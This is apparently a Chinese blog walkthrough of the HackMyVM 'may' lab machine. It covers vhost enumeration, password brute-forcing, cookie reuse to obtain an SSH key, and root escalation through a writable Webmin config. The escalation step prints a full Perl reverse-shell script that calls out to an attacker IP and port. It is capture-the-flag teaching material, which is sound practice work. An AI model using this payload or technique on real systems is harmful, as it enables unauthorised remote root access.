hackmyvm: may walkthrough

最新推荐文章于 2024-02-06 02:56:35 发布
最新推荐文章于 2024-02-06 02:56:35 发布
阅读量432 收藏
点赞数
分类专栏: hackmyvm
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xdeclearn/article/details/119642058
版权

hackmyvm: may walkthrough

信息收集

port
访问80,会跳转到域名may.hmv访问,这里需添加hosts访问。
user
得到了一个用户明marie
爆破目录未果,于是爆破vhost。
vhost
找到两个vhost,portalssh。添加hosts后访问portal.may.hmv。这个一个登录页面,会验证用户名和密码,尝试注入失败后,利用前面得到的用户名尝试爆破密码。
pass
得到密码rebelde并成功获取到了cookie,将这个cookie注入到http://ssh.may.hmv/check.php的请求中去,成功获取marie用户的私钥。
id_rsa

获取user flag

将私钥保存,并设置为只可当前用户读写,ssh登录marie
mariessh
userflag

获取root flag

查看root用户进程,发现了如下进程。
webmin
查看miniserv.conf文件权限,发现marie可以直接编辑,于是在home目录下创建一个failed.pl替换掉默认的。

miniserv
modifyminiserv
failed.pl中加入了反弹shell代码。

marie@may:~$ cat failed.pl 
#!/usr/bin/perl
use Socket;$i="192.168.143.135";$p=5555;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};
open(CONF, "</etc/webmin/miniserv.conf") || die "Failed to open /etc/webmin/miniserv.conf : $!";
while(<CONF>) {
        $root = $1 if (/^root=(.*)/);
        }
close(CONF);
$root || die "No root= line found in /etc/webmin/miniserv.conf";
$ENV{'PERLLIB'} = "$root";
$ENV{'WEBMIN_CONFIG'} = "/etc/webmin";
$ENV{'WEBMIN_VAR'} = "/var/webmin";
delete($ENV{'MINISERV_CONFIG'});
chdir("$root");
exec("$root/record-failed.pl", @ARGV) || die "Failed to run $root/record-failed.pl : $!";

利用sudo重启虚拟机(marie可以无密码执行sudo reboot)。重启后随便webmin登录一个错误账号就可以反弹root。
rootflag

xdeclearn
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
hackmyvm入门(靶机网络配置)
Bu2n的博客
04-13 6270
hackmyvm概述hackmyvm靶机下载地址靶机网络配置测试环境环境搭建愉快玩耍 hackmyvm概述 hackmyvm是一个平台,包含了大量靶机,类似于vulnhub、hackthebox等平台,你可以在上面下载靶机,进行渗透测试练习,非常适合热爱黑客技术或从事渗透测试的人员。我个人觉得,hackmyvm相比vulnhub好的地方在于它的靶机所占磁盘空间小,hackmyvm靶机一般在1G左右,而vulnhub靶机动不动就2G,甚至我见过还有6G的。不扯这些了,今天是聊一聊hackmyvm到底怎么玩.
HackMyVM —find
Innocence_0的博客
07-24 151
发现并不存在boom目录,创建boom目录和boom.sh文件。发现并不存在boom目录,创建boom目录和boom.sh文件。提取到root,查看/root/root.txt。提取到root,查看/root/root.txt。攻击手法:Malbolge语言、sudo提权。发现存在cat.jpg和robots.txt。目标: user.txt root.txt。下载并进行对比,发现一段代码。下载并查看 cat.jpg。找到第一个user.txt。查看robots.txt。
alzheimer ---hackmyvm
m0_64253567的博客
07-23 194
hackmyvm ----alzheimer
HackMyvm靶机系列(3)-visions
qq_70727026的博客
05-12 1091
一、信息收集 先探测网段,得到目标主机 nmap -sP 192.168.200.0/24 | grep -i -B 2 virtualbox 然后进行端口扫描,发现ssh服务和http服务 nmap -sC -sV -p- 192.168.200.234 访问一下http服务,发现只有一张图片和一段注释。 这段注释看上去是一个提示,aliccia猜测可能是一个用户 使用dirsearch扫描一下目录,看看能有什么收获不 dirsearch -u http://19..
打靶手记之hackmyvm--UnbakedPie
最新发布
milu_Sec的博客
02-06 813
关于反序列化,可能有小白还不理解,这里如果直接解释会有点过臃长了,简单来说序列化的目的是为了保存、传递和恢复对象,不同的语言有自己不同的序列化方式,这里建议小白从php的序列化开始学习,如果实在想不通,可以理解成,为了方便,把对象通过某种算法变成了一串编码,如果有师傅需要,麋鹿后期也可以针对序列化出系列专栏。相比于 PHP 反序列化必须要依赖于当前代码中类的存在以及方法的存在,python的序列化其实就是把它转换成相应的操作码,当我们进行反序列化的时候,是把那一串操作码变回来,
findbugs:may expose internal representation by returning
04-17
《深入理解FindBugs:可能通过返回暴露内部表示——“NULL”问题分析》 在软件开发过程中,确保代码的质量和安全至关重要。FindBugs作为一款静态代码分析工具,能够帮助开发者在程序运行前发现潜在的问题。...
Maya:Maye一个简洁小巧的快速启动工具
03-07
玛雅(原玛雅)马爷是一款体积小巧,简单易用的快速启动工具不要看体积小巧,它的功能还是非常多样化的,比如:多文件拖拽添加启动,快捷键呼出,自动多列显示,LNK文件解析等等。软件没有繁杂的功能,操作中也不会...
leetcodepremium是什么-May_LeetCoding_Challenge:May_LeetCoding_Challenge
06-30
May_LeetCoding_Challenge 此挑战适合初学者,高级和非高级用户均可使用。 它由 5 月份的 31 道日常问题组成。 每天都会在此处添加一个问题,您有 24 小时的时间对其进行有效提交,以便有资格获得奖励。 在这个 May ...
Maye:Maye 一个简洁小巧的快速启动工具-开源
07-06
Maye是一款体积小巧、简单易用的快速启动工具。不要看体积小巧,它的功能还是非常多样化的,比如:多文件拖拽添加启动、快捷键呼出、自动多列显示、lnk文件解析等等。软件没有繁杂的功能,操作中也不会产生任何垃圾...
大班英语教案:May I come in Come in,please.doc
09-09
大班英语教案:May I come in Come in,please.doc
渗透靶场——HackMyVM:Tom
tlovejr的博客
03-28 2021
部署环境 提供镜像文件后,直接用虚拟机打开即可,kali攻击机用VMware打开即可,靶机用vbox打开即可 kali攻击机ip地址:192.168.1.11(桥接) 靶机ip地址:(桥接自动获取ip) 信息收集 扫描主机 arp-scan -l 发现了存活主机的ip地址为192.168.1.69 扫描端口 扫描靶机开放的服务端口 nmap -p- -A 192.168.1.69 发现有22,80,8080端口进行开放,正常情况下我们现在先在80端口开始突破 Web渗透 http://192.
渗透靶场——HackMyVM:BlackWidow
tlovejr的博客
04-06 3152
部署环境 提供镜像文件后,直接用虚拟机打开即可,kali攻击机用VMware打开即可,靶机用vbox打开即可 kali攻击机ip地址:192.168.1.11(桥接) 靶机ip地址:(桥接自动获取ip) 目标: user.txt和root.txt 信息收集 扫描主机 arp-scan -l 发现存活主机ip地址:192.168.1.118 扫描端口 扫描靶机开放的服务端口 nmap -A -T4 -p- 192.168.1.118 在这里发现了很多开放的端口,那么我们还是老规矩,先在80端口进
hackmyvm System 靶机练习(最玄学的拿root经历)
Bu2n的博客
04-16 672
主机发现端口扫描漏洞挖掘权限提升 主机发现 端口扫描 漏洞挖掘 访问web,发现是一个登录表单 打开burpsuite,抓包分析,发现请求体是xml格式,立马想到XXE 发送到Repeater模块进行测试,发现email那个位置可以利用,因为他在页面上有回显 我在请求体的XML引用了外部实体,结果发现程序启用了外部实体,也就是说这里真有XXE漏洞 <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE ANY [ <!E.
Hackmyvm综合靶机 | HackMyVM-Area51
IerkeU的博客
04-18 2977
一个集合了Weblogic4j的漏洞且可以使用通杀漏洞:Linux Polkit提权的靶机,很不错哦
渗透靶场——HackMyVM:Pingme
tlovejr的博客
04-13 3287
部署环境 提供镜像文件后,直接用虚拟机打开即可,kali攻击机用VMware打开即可,靶机用vbox打开即可 kali攻击机ip地址:桥接自动获取ip 靶机ip地址:(桥接自动获取ip) 提示信息: CTF 目标: user.txt和root.txt 信息收集 扫描主机 arp-scan -l 发现存活主机192.168.1.10 扫描端口 扫描靶机开放的服务端口 nmap -A -T4 -p- 192.168.1.10 发现还是只有22端口和80端口开放 Web渗透 访问web端口 http:
hackmyvm之warez
qwweggfe的博客
09-03 430
0x01基本信息 地址:https://hackmyvm.eu/machines/machine.php?vm=Warez 靶机ip:192.168.181.159 keli IP:192.168.181.129 0x02实施过程 首先进行ip扫描 于是打开网页进行查看 于是我进行目录扫描 gobuster dir -u http://192.168.181.159/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-me..
HackMyvm靶机系列(1)-webmaster
qq_70727026的博客
05-10 1187
一、信息收集 首先先使用nmap扫描网段,探测存活主机。 nmap -sP 192.168.200.0/24 | grep -i -B 2 virtualbox 对目标主机进行端口扫描,探测目标开放的服务 nmap -sT -T4 -sV -O -A -sC -p- 192.168.200.8 扫描到三个服务,ssh,dns,http 访问一下,发现是一张图片,大致意思就是你把密码保存在哪里?Bitwarden和..
hackmyvm-bunny walkthrough
xdeclearn的博客
08-09 187
hackmyvm-buny walkthrough 难度(作者评价):difficult 信息收集 PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 获取shell 端口信息很少,常规操作,访问80,爆破目录。 upload.php,password.txt,config.php都是没有实际含义的文本文件。phpinfo.php泄露了主机的相关信息。 能想到的就是index.php是不是存在ssrf。于是利用ffuf对index.php进
Hackmyvm综合靶机 | Driftingblues-1
IerkeU的博客
04-01 3164
前提概要 靶场地址:https://www.vulnhub.com/entry/driftingblues-1,625/,是一个极其简单的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / nmap下的工具) 二珂说:这个靶机系列是跟着新仔一起入坑的,他太卷了,咱们也不能速度太慢了!!!后面还会再次复习DC靶机的实现过程… 信息收集 arp-scan 192.168.132.0/24 之前都是扫出目标后就之间nmap一把梭 后面了解到这样容易暴露目标 所以
error: this statement may fall through
05-19
这个错误通常出现在 switch 语句中,意味着某个 case 分支没有以 break 或 return 结束,导致程序会执行下一个 case 分支,可能会引发逻辑错误。 解决方法是在每个 case 分支的结尾添加 break 或 return 语句,确保程序不会继续执行下一个分支。如果你是故意让程序继续执行下一个分支,可以使用注释来告诉编译器这是有意为之的,比如在下一个 case 分支前添加注释 // fall through。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值